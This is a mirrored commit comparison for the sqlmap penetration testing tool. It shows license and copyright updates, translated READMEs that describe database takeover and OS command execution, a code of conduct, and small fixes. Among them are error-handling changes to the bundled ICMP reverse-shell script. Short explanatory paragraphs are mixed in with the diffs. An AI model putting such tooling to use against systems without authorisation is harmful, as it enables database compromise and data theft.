Mirror of https://github.com/sqlmapproject/sqlmap.git (synced 2025-12-06 20:51:31 +00:00)
Compare commits
407 Commits
Commits af89137f2c through 672abe8416.
.github/CODE_OF_CONDUCT.md (new file, vendored, 46 lines)
@@ -0,0 +1,46 @@
+# Contributor Covenant Code of Conduct
+
+## Our Pledge
+
+In the interest of fostering an open and welcoming environment, we as contributors and maintainers pledge to making participation in our project and our community a harassment-free experience for everyone, regardless of age, body size, disability, ethnicity, gender identity and expression, level of experience, nationality, personal appearance, race, religion, or sexual identity and orientation.
+
+## Our Standards
+
+Examples of behavior that contributes to creating a positive environment include:
+
+* Using welcoming and inclusive language
+* Being respectful of differing viewpoints and experiences
+* Gracefully accepting constructive criticism
+* Focusing on what is best for the community
+* Showing empathy towards other community members
+
+Examples of unacceptable behavior by participants include:
+
+* The use of sexualized language or imagery and unwelcome sexual attention or advances
+* Trolling, insulting/derogatory comments, and personal or political attacks
+* Public or private harassment
+* Publishing others' private information, such as a physical or electronic address, without explicit permission
+* Other conduct which could reasonably be considered inappropriate in a professional setting
+
+## Our Responsibilities
+
+Project maintainers are responsible for clarifying the standards of acceptable behavior and are expected to take appropriate and fair corrective action in response to any instances of unacceptable behavior.
+
+Project maintainers have the right and responsibility to remove, edit, or reject comments, commits, code, wiki edits, issues, and other contributions that are not aligned to this Code of Conduct, or to ban temporarily or permanently any contributor for other behaviors that they deem inappropriate, threatening, offensive, or harmful.
+
+## Scope
+
+This Code of Conduct applies both within project spaces and in public spaces when an individual is representing the project or its community. Examples of representing a project or community include using an official project e-mail address, posting via an official social media account, or acting as an appointed representative at an online or offline event. Representation of a project may be further defined and clarified by project maintainers.
+
+## Enforcement
+
+Instances of abusive, harassing, or otherwise unacceptable behavior may be reported by contacting the project team at dev@sqlmap.org. The project team will review and investigate all complaints, and will respond in a way that it deems appropriate to the circumstances. The project team is obligated to maintain confidentiality with regard to the reporter of an incident. Further details of specific enforcement policies may be posted separately.
+
+Project maintainers who do not follow or enforce the Code of Conduct in good faith may face temporary or permanent repercussions as determined by other members of the project's leadership.
+
+## Attribution
+
+This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4, available at [http://contributor-covenant.org/version/1/4][version]
+
+[homepage]: http://contributor-covenant.org
+[version]: http://contributor-covenant.org/version/1/4/
@@ -24,7 +24,6 @@ Many [people](https://raw.github.com/sqlmapproject/sqlmap/master/doc/THANKS.md)
 In order to maintain consistency and readability throughout the code, we ask that you adhere to the following instructions:
 
 * Each patch should make one logical change.
-* Wrap code to 76 columns when possible.
 * Avoid tabbing, use four blank spaces instead.
 * Before you put time into a non-trivial patch, it is worth discussing it privately by [email](mailto:dev@sqlmap.org).
 * Do not change style on numerous files in one single pull request, we can [discuss](mailto:dev@sqlmap.org) about those before doing any major restyling, but be sure that personal preferences not having a strong support in [PEP 8](http://www.python.org/dev/peps/pep-0008/) will likely to be rejected.
@@ -1,4 +1,7 @@
 language: python
+sudo: false
+git:
+  depth: 1
 python:
 - "2.6"
 - "2.7"
@@ -1,7 +1,7 @@
 COPYING -- Describes the terms under which sqlmap is distributed. A copy
 of the GNU General Public License (GPL) is appended to this file.
 
-sqlmap is (C) 2006-2017 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
+sqlmap is (C) 2006-2018 Bernardo Damele Assumpcao Guimaraes, Miroslav Stampar.
 
 This program is free software; you may redistribute and/or modify it under
 the terms of the GNU General Public License as published by the Free
@@ -31,6 +31,9 @@ interpretation of derived works with some common examples. Our
 interpretation applies only to sqlmap - we do not speak for other people's
 GPL works.
 
+This license does not apply to the third-party components. More details can
+be found inside the file 'doc/THIRD-PARTY.md'.
+
 If you have any questions about the GPL licensing restrictions on using
 sqlmap in non-GPL works, we would be happy to help. As mentioned above,
 we also offer alternative license to integrate sqlmap into proprietary
@@ -343,29 +346,3 @@ PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
 POSSIBILITY OF SUCH DAMAGES.
 
 END OF TERMS AND CONDITIONS
-
-****************************************************************************
-
-This license does not apply to the following components:
-
-* The Ansistrm library located under thirdparty/ansistrm/.
-* The Beautiful Soup library located under thirdparty/beautifulsoup/.
-* The Bottle library located under thirdparty/bottle/.
-* The Chardet library located under thirdparty/chardet/.
-* The ClientForm library located under thirdparty/clientform/.
-* The Colorama library located under thirdparty/colorama/.
-* The Fcrypt library located under thirdparty/fcrypt/.
-* The Gprof2dot library located under thirdparty/gprof2dot/.
-* The KeepAlive library located under thirdparty/keepalive/.
-* The Magic library located under thirdparty/magic/.
-* The MultipartPost library located under thirdparty/multipartpost/.
-* The Odict library located under thirdparty/odict/.
-* The Oset library located under thirdparty/oset/.
-* The PrettyPrint library located under thirdparty/prettyprint/.
-* The PyDes library located under thirdparty/pydes/.
-* The SocksiPy library located under thirdparty/socks/.
-* The Termcolor library located under thirdparty/termcolor/.
-* The XDot library located under thirdparty/xdot/.
-* The icmpsh tool located under extra/icmpsh/.
-
-Details for the above packages can be found in the THIRD-PARTY.md file.
@@ -1,9 +1,11 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
 
+**The sqlmap project is sponsored by [Netsparker Web Application Security Scanner](https://www.netsparker.com/?utm_source=github.com&utm_medium=referral&utm_content=sqlmap+repo&utm_campaign=generic+advert).**
+
 Screenshots
 ----
 
@@ -60,6 +62,8 @@ Translations
 * [Indonesian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-id-ID.md)
 * [Italian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-it-IT.md)
 * [Japanese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ja-JP.md)
+* [Polish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pl-PL.md)
 * [Portuguese](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-pt-BR.md)
+* [Russian](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-ru-RUS.md)
 * [Spanish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-es-MX.md)
 * [Turkish](https://github.com/sqlmapproject/sqlmap/blob/master/doc/translations/README-tr-TR.md)
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap e инструмент за тестване и проникване, с отворен код, който автоматизира процеса на откриване и използване на недостатъците на SQL база данните чрез SQL инжекция, която ги взима от сървъра. Снабден е с мощен детектор, множество специални функции за най-добрия тестер и широк спектър от функции, които могат да се използват за множество цели - извличане на данни от базата данни, достъп до основната файлова система и изпълняване на команди на операционната система.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap es una herramienta para pruebas de penetración "penetration testing" de software libre que automatiza el proceso de detección y explotación de fallos mediante inyección de SQL además de tomar el control de servidores de bases de datos. Contiene un poderoso motor de detección, así como muchas de las funcionalidades escenciales para el "pentester" y una amplia gama de opciones desde la recopilación de información para identificar el objetivo conocido como "fingerprinting" mediante la extracción de información de la base de datos, hasta el acceso al sistema de archivos subyacente para ejecutar comandos en el sistema operativo a través de conexiones alternativas conocidas como "Out-of-band".
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 **sqlmap** est un outil Open Source de test d'intrusion. Cet outil permet d'automatiser le processus de détection et d'exploitation des failles d'injection SQL afin de prendre le contrôle des serveurs de base de données. __sqlmap__ dispose d'un puissant moteur de détection utilisant les techniques les plus récentes et les plus dévastatrices de tests d'intrusion comme L'Injection SQL, qui permet d'accéder à la base de données, au système de fichiers sous-jacent et permet aussi l'exécution des commandes sur le système d'exploitation.
 
@@ -13,7 +13,7 @@ Les captures d'écran disponible [ici](https://github.com/sqlmapproject/sqlmap/w
 Installation
 ----
 
-Vous pouvez télécharger le plus récent fichier tarball en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger le plus récent archive zip [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
+Vous pouvez télécharger le fichier "tarball" le plus récent en cliquant [ici](https://github.com/sqlmapproject/sqlmap/tarball/master). Vous pouvez aussi télécharger l'archive zip la plus récente [ici](https://github.com/sqlmapproject/sqlmap/zipball/master).
 
 De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sqlmapproject/sqlmap):
 
@@ -21,7 +21,7 @@ De préférence, télécharger __sqlmap__ en le [clonant](https://github.com/sql
 
 sqlmap fonctionne sur n'importe quel système d'exploitation avec la version **2.6.x** et **2.7.x** de [Python](http://www.python.org/download/)
 
-Usage
+Utilisation
 ----
 
 Pour afficher une liste des fonctions de bases et des commutateurs (switches), tapez:
@@ -33,7 +33,7 @@ Pour afficher une liste complète des options et des commutateurs (switches), ta
 python sqlmap.py -hh
 
 Vous pouvez regarder un vidéo [ici](https://asciinema.org/a/46601) pour plus d'exemples.
-Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge et la description de toutes les options, ainsi que des exemples , nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+Pour obtenir un aperçu des ressources de __sqlmap__, une liste des fonctionnalités prises en charge, la description de toutes les options, ainsi que des exemples, nous vous recommandons de consulter [le wiki](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
 
 Liens
 ----
@@ -41,7 +41,7 @@ Liens
 * Page d'acceuil: http://sqlmap.org
 * Téléchargement: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) ou [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
 * Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
-* Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
+* Suivi des issues: https://github.com/sqlmapproject/sqlmap/issues
 * Manuel de l'utilisateur: https://github.com/sqlmapproject/sqlmap/wiki
 * Foire aux questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
 * Twitter: [@sqlmap](https://twitter.com/sqlmap)
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 Το sqlmap είναι πρόγραμμα ανοιχτού κώδικα, που αυτοματοποιεί την εύρεση και εκμετάλλευση ευπαθειών τύπου SQL Injection σε βάσεις δεδομένων. Έρχεται με μια δυνατή μηχανή αναγνώρισης ευπαθειών, πολλά εξειδικευμένα χαρακτηριστικά για τον απόλυτο penetration tester όπως και με ένα μεγάλο εύρος επιλογών αρχίζοντας από την αναγνώριση της βάσης δεδομένων, κατέβασμα δεδομένων της βάσης, μέχρι και πρόσβαση στο βαθύτερο σύστημα αρχείων και εκτέλεση εντολών στο απευθείας στο λειτουργικό μέσω εκτός ζώνης συνδέσεων.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap je alat namijenjen za penetracijsko testiranje koji automatizira proces detekcije i eksploatacije sigurnosnih propusta SQL injekcije te preuzimanje poslužitelja baze podataka. Dolazi s moćnim mehanizmom za detekciju, mnoštvom korisnih opcija za napredno penetracijsko testiranje te široki spektar opcija od onih za prepoznavanja baze podataka, preko dohvaćanja podataka iz baze, do pristupa zahvaćenom datotečnom sustavu i izvršavanja komandi na operacijskom sustavu korištenjem tzv. "out-of-band" veza.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap merupakan alat _(tool)_ bantu _open source_ dalam melakukan tes penetrasi yang mengotomasi proses deteksi dan eksploitasi kelemahan _SQL injection_ dan pengambil-alihan server basisdata. sqlmap dilengkapi dengan pendeteksi canggih, fitur-fitur hanal bagi _penetration tester_, beragam cara untuk mendeteksi basisdata, hingga mengakses _file system_ dan mengeksekusi perintah dalam sistem operasi melalui koneksi _out-of-band_.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap è uno strumento open source per il penetration testing. Il suo scopo è quello di rendere automatico il processo di scoperta ed exploit di vulnerabilità di tipo SQL injection al fine di compromettere database online. Dispone di un potente motore per la ricerca di vulnerabilità, molti strumenti di nicchia anche per il più esperto penetration tester ed un'ampia gamma di controlli che vanno dal fingerprinting di database allo scaricamento di dati, fino all'accesso al file system sottostante e l'esecuzione di comandi nel sistema operativo attraverso connessioni out-of-band.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmapはオープンソースのペネトレーションテスティングツールです。SQLインジェクションの脆弱性の検出、活用、そしてデータベースサーバ奪取のプロセスを自動化します。
 強力な検出エンジン、ペネトレーションテスターのための多くのニッチ機能、持続的なデータベースのフィンガープリンティングから、データベースのデータ取得やアウトオブバンド接続を介したオペレーティング・システム上でのコマンド実行、ファイルシステムへのアクセスなどの広範囲に及ぶスイッチを提供します。
doc/translations/README-pl-PL.md (new file, 50 lines)
@@ -0,0 +1,50 @@
+# sqlmap
+
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap to open sourceowe narzędzie do testów penetracyjnych, które automatyzuje procesy detekcji, przejmowania i testowania odporności serwerów SQL na podatność na iniekcję niechcianego kodu. Zawiera potężny mechanizm detekcji, wiele niszowych funkcji dla zaawansowanych testów penetracyjnych oraz szeroki wachlarz opcji począwszy od identyfikacji bazy danych, poprzez wydobywanie z nich danych, a nawet pozwalającuch na dostęp do systemu plików o uruchamianie poleceń w systemie operacyjnym serwera poprzez niestandardowe połączenia.
+
+Zrzuty ekranowe
+----
+
+
+
+Możesz odwiedzić [kolekcję zrzutów](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) demonstruującą na wiki niektóre możliwości.
+
+Instalacja
+----
+
+Najnowsze tarball archiwum jest dostępne po klikcięciu [tutaj](https://github.com/sqlmapproject/sqlmap/tarball/master) lub najnowsze zipball archiwum po kliknięciu [tutaj](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Można również pobrać sqlmap klonując rezozytorium [Git](https://github.com/sqlmapproject/sqlmap):
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+do użycia sqlmap potrzebny jest [Python](http://www.python.org/download/) w wersji **2.6.x** lub **2.7.x** na dowolnej platformie systemowej.
+
+Sposób użycia
+----
+
+Aby uzyskać listę podstawowych funkcji i parametrów użyj polecenia:
+
+    python sqlmap.py -h
+
+Aby uzyskać listę wszystkich funkcji i parametrów użyj polecenia:
+
+    python sqlmap.py -hh
+
+Przykładowy wynik działania dostępny [tutaj](https://asciinema.org/a/46601).
+Aby uzyskać listę wszystkich dostępnych fukcji, parametrów i opisów ich działania wraz z przykładami użycia sqlnap proponujemy odwiedzić [instrukjcę użytkowania](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Odnośniki
+----
+
+* Strona projektu: http://sqlmap.org
+* Pobieranie: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) or [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Raportowanie błędów: https://github.com/sqlmapproject/sqlmap/issues
+* Instrukcja użytkowania: https://github.com/sqlmapproject/sqlmap/wiki
+* Często zadawane pytania (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Dema: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Zrzuty ekranowe: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap é uma ferramenta de teste de penetração de código aberto que automatiza o processo de detecção e exploração de falhas de injeção SQL. Com essa ferramenta é possível assumir total controle de servidores de banco de dados em páginas web vulneráveis, inclusive de base de dados fora do sistema invadido. Ele possui um motor de detecção poderoso, empregando as últimas e mais devastadoras técnicas de teste de penetração por SQL Injection, que permite acessar a base de dados, o sistema de arquivos subjacente e executar comandos no sistema operacional.
 
doc/translations/README-ru-RUS.md (new file, 50 lines)
@@ -0,0 +1,50 @@
+# sqlmap
+
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
+
+sqlmap - это инструмент для тестирования уязвимостей с открытым исходным кодом, который автоматизирует процесс обнаружения и использования ошибок SQL-инъекций и захвата серверов баз данных. Он оснащен мощным механизмом обнаружения, множеством приятных функций для профессионального тестера уязвимостей и широким спектром скриптов, которые упрощают работу с базами данных, от сбора данных из базы данных, до доступа к базовой файловой системе и выполнения команд в операционной системе через out-of-band соединение.
+
+Скриншоты
+----
+
+
+
+Вы можете посетить [набор скриншотов](https://github.com/sqlmapproject/sqlmap/wiki/Screenshots) демонстрируемые некоторые функции в wiki.
+
+Установка
+----
+
+Вы можете скачать последнюю версию tarball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/tarball/master) или последний zipball, нажав [сюда](https://github.com/sqlmapproject/sqlmap/zipball/master).
+
+Предпочтительно вы можете загрузить sqlmap, клонируя [Git](https://github.com/sqlmapproject/sqlmap) репозиторий:
+
+    git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev
+
+sqlmap работает из коробки с [Python](http://www.python.org/download/) версии **2.6.x** и **2.7.x** на любой платформе.
+
+Использование
+----
+
+Чтобы получить список основных опций и вариантов выбора, используйте:
+
+    python sqlmap.py -h
+
+Чтобы получить список всех опций и вариантов выбора, используйте:
+
+    python sqlmap.py -hh
+
+Вы можете найти пробный запуск [тут](https://asciinema.org/a/46601).
+Чтобы получить обзор возможностей sqlmap, список поддерживаемых функций и описание всех параметров и переключателей, а также примеры, вам рекомендуется ознакомится с [пользовательским мануалом](https://github.com/sqlmapproject/sqlmap/wiki/Usage).
+
+Ссылки
+----
+
+* Основной сайт: http://sqlmap.org
+* Скачивание: [.tar.gz](https://github.com/sqlmapproject/sqlmap/tarball/master) или [.zip](https://github.com/sqlmapproject/sqlmap/zipball/master)
+* Канал новостей RSS: https://github.com/sqlmapproject/sqlmap/commits/master.atom
+* Отслеживание проблем: https://github.com/sqlmapproject/sqlmap/issues
+* Пользовательский мануал: https://github.com/sqlmapproject/sqlmap/wiki
+* Часто задаваемые вопросы (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
+* Twitter: [@sqlmap](https://twitter.com/sqlmap)
+* Демки: [http://www.youtube.com/user/inquisb/videos](http://www.youtube.com/user/inquisb/videos)
+* Скриншоты: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap sql injection açıklarını otomatik olarak tespit ve istismar etmeye yarayan açık kaynak bir penetrasyon aracıdır. sqlmap gelişmiş tespit özelliğinin yanı sıra penetrasyon testleri sırasında gerekli olabilecek bir çok aracı, -uzak veritabınınından, veri indirmek, dosya sistemine erişmek, dosya çalıştırmak gibi - işlevleri de barındırmaktadır.
 
@@ -1,6 +1,6 @@
 # sqlmap
 
-[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/doc/COPYING) [](https://twitter.com/sqlmap)
+[](https://api.travis-ci.org/sqlmapproject/sqlmap) [](https://www.python.org/) [](https://raw.githubusercontent.com/sqlmapproject/sqlmap/master/LICENSE) [](https://twitter.com/sqlmap)
 
 sqlmap 是一个开源的渗透测试工具,可以用来自动化的检测,利用SQL注入漏洞,获取数据库服务器的权限。它具有功能强大的检测引擎,针对各种不同类型数据库的渗透测试的功能选项,包括获取数据库中存储的数据,访问操作系统文件甚至可以通过外带数据连接的方式执行操作系统命令。
 
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -3,8 +3,8 @@
 """
 beep.py - Make a beep sound
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import os
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
extra/cloak/cloak.py — mode change: Executable file → Normal file (4 lines changed)
@@ -3,8 +3,8 @@
 """
 cloak.py - Simple file encryption/compression utility
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import os
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 pass
@@ -3,8 +3,8 @@
 """
 dbgtool.py - Portable executable to ASCII debug script converter
 
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import os
extra/icmpsh/icmpsh-m.pl — mode change: Executable file → Normal file (0 lines changed)

@@ -80,7 +80,7 @@ def main(src, dst):
     cmd = ''
 
     # Wait for incoming replies
-    if sock in select.select([ sock ], [], [])[0]:
+    if sock in select.select([sock], [], [])[0]:
         buff = sock.recv(4096)
 
         if 0 == len(buff):
@@ -125,8 +125,12 @@ def main(src, dst):
     # Have the IP packet contain the ICMP packet (along with its payload)
     ip.contains(icmp)
 
-    # Send it to the target host
-    sock.sendto(ip.get_packet(), (dst, 0))
+    try:
+        # Send it to the target host
+        sock.sendto(ip.get_packet(), (dst, 0))
+    except socket.error, ex:
+        sys.stderr.write("'%s'\n" % ex)
+        sys.stderr.flush()
 
 if __name__ == '__main__':
     if len(sys.argv) < 3:
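The two hunks above come from a Python script whose filename is not shown in this capture (the `def main(src, dst):` context suggests the ICMP shell master); the second hunk guards the raw-socket send with Python 2's comma-style `except socket.error, ex:` syntax. As a point of comparison only, a rough sketch of the same guard in more modern syntax is given below; `sock`, the packet payload, and `dst` are taken from the hunk, while the wrapping function is assumed.

```python
import socket
import sys

def send_reply(sock, packet, dst):
    # Send the raw IP/ICMP packet to the target host; a transient socket
    # error should not abort the caller's loop, so only report it on stderr.
    try:
        sock.sendto(packet, (dst, 0))
    except socket.error as ex:  # written "except socket.error, ex:" in the Python 2 code above
        sys.stderr.write("'%s'\n" % ex)
        sys.stderr.flush()
```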
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
 import codecs
@@ -43,7 +43,7 @@ def updateMSSQLXML():
 
         return
 
-    releases = re.findall("class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
+    releases = re.findall(r"class=\"BCC_DV_01DarkBlueTitle\">SQL Server\s(.+?)\sBuilds", mssqlVersionsHtmlString, re.I)
     releasesCount = len(releases)
 
     # Create the minidom document
@@ -74,7 +74,7 @@ def updateMSSQLXML():
             stopIdx = mssqlVersionsHtmlString.index("SQL Server %s Builds" % releases[index + 1])
 
         mssqlVersionsReleaseString = mssqlVersionsHtmlString[startIdx:stopIdx]
-        servicepackVersion = re.findall("</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
+        servicepackVersion = re.findall(r"</td><td>(7\.0|2000|2005|2008|2008 R2)*(.*?)</td><td.*?([\d\.]+)</td>[\r]*\n", mssqlVersionsReleaseString, re.I)
 
         for servicePack, version in servicepackVersion:
            if servicePack.startswith(" "):
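The only functional change in the two `updateMSSQLXML()` hunks above (and in the similar hunks in extra/shutils/pylint.py further down) is the added `r` prefix on the regular-expression literals. A small, self-contained illustration of why that matters follows; the pattern here is a shortened form of the one in the hunk and is only for demonstration.

```python
import re

html = "<td>SQL Server 2008 Builds</td>"

# In a plain string literal, "\s" is an invalid escape sequence and newer
# Python versions warn about it; a raw string passes the backslashes through
# to the regular-expression engine unchanged.
pattern = r"SQL Server\s(.+?)\sBuilds"

print(re.findall(pattern, html, re.I))  # ['2008']
```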
@@ -1,8 +1,8 @@
 #!/usr/bin/env python
 
 """
-Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
-See the file 'doc/COPYING' for copying permission
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
 """
 
